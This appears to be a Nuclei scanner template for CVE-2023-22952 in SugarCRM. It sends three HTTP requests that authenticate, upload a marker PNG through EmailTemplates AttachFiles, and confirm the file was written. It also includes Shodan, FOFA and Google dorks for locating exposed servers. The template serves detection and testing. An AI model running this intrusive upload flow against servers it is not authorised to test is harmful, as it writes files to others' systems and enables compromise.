id: CVE-2023-22952

info:
  name: SugarCRM Unauthenticated - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.
  impact: |
    Authenticated attackers can inject custom PHP code through EmailTemplates to execute arbitrary commands on the SugarCRM server, potentially compromising customer relationship data and business intelligence information.
  remediation: |
    Update SugarCRM to version 12.0 Hotfix 91155 or later that implements proper input validation for EmailTemplates.
  reference:
    - https://attackerkb.com/topics/E486ui94II/cve-2023-22952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-22952
    cwe-id: CWE-20,CWE-94
    epss-score: 0.92822
    epss-percentile: 0.9977
    cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:*
  metadata:
    vendor: sugarcrm
    product: sugarcrm
    shodan-query:
      - http.html:"sugarcrm inc. all rights reserved"
      - http.title:"sugar setup wizard"
      - http.title:"sugarcrm"
    fofa-query:
      - body="sugarcrm inc. all rights reserved"
      - title="sugar setup wizard"
      - title=sugarcrm
    google-query:
      - intext:"sugarcrm inc. all rights reserved"
      - intitle:"sugar setup wizard"
      - intitle:sugarcrm
  tags: cve,cve2023,sugarcrm,rce,file-upload,intrusive,kev,vkev,vuln

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - 'You must specify a valid username and password'

  - raw:
      - |-
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWeTJtA8WByYIQMGR
        Connection: close

        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="action"

        AttachFiles
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="module"

        EmailTemplates
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
        Content-Type: image/png

        {{ base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAUAAAAUBAMAAAC3y+roAAAAD1BMVEVDVkUtMjAyMy0yMjk1MiA7qbPWAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAEUlEQVQImWNgAAJGZQcGKgEAHPkAZVUOitsAAAAASUVORK5CYII=')}}
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR--


    matchers:
      - type: word
        part: body
        internal: true
        words:
          - '["cache\/images\/{{randstr}}.txt"]'

  - raw:
      - |
        GET /cache/images/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2023-22952"

      - type: word
        part: header
        words:
          - "text/plain"
# digest: 4a0a0047304502203d5639955dde96580c927fda3053a899928a61defa334828430bba374bf35dc60221008cd30b6c4c413cf4ba61a89e86791e26f2c598d04b4377e0767f326829569a76:922c64590222798bb761d5b6d8e72950